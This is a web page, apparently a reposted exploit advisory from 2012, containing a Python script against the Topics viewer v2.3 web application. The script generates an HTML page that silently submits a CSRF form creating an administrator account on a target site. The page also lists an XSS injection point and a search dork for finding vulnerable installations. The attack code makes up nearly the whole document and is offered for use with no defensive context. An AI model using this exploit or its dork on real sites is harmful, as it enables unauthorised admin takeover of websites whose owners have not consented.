Topics viewer v 2.3 csrf (Add Admin) / XSS Vulnerabilites
|
来源:http://nilehoster.com/default/topicsviewer 作者:Cyber-Crystal 发布时间:2012-05-15
|
|
#!/usr/bin/env python ######################################################################## # Title : Topics viewer v 2.3 csrf Add Admin and XSS # Author : Cyber-Crystal # Version : 2.3 # Homepage : http://nilehoster.com/default/topicsviewer # Dork : "Programmed by : Nilehoster.com" # Tested on: Win/7 # Based on POC : http://vb.ehcommunity.com/showthread.php?t=70682 # CVE : 14 May 2012 #--------------------------------------------------------------------- # ^_^ > snc0pe | secure-x41 | Dmar al3noOoz | al-swisre || All # # # Xss Exploit is Here : # http://localhost//admincp/edit_block.php?id=XSS
import sys import string import os
def banner(): print ''' ---------------------------------- Topics viewer v 2.3 csrf Add Admin ----------------------------------
[+] python Exploit.py http://www.exp.com ''' if os.name == "nt": os.system("cls") os.system("color e") else : os.system('clear') if len(sys.argv) < 2: banner() sys.exit() vic = sys.argv[1].replace("http://","").replace("/","") file = open("Exploit.html", "w")
db = ("<html>\n" "<body>\n" "<form action='http://"+vic+"/admincp/main.php?op=add-admin' method='post' name='sdf'>\n" "<input type='text' name='u_name' value='p0c' />\n" "<input type='text' name='u_m_pass' value='1212' />\n" "<input type='text' name='u_email' value='p0c@p0c.com' />\n" "<input type='text' name='verification' value='101010'/> <!-- Any number-->\n" "<script>document.xss.submit();</script><br />\n" "<input type='submit' value='Exploit'/>\n" "</form>\n" "</body>\n" "</html>\n") file.write(db) print "Createing ...\n" print "user Name And Password ...\n" print "User : p0c \t Pass : 1212"
# The End
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|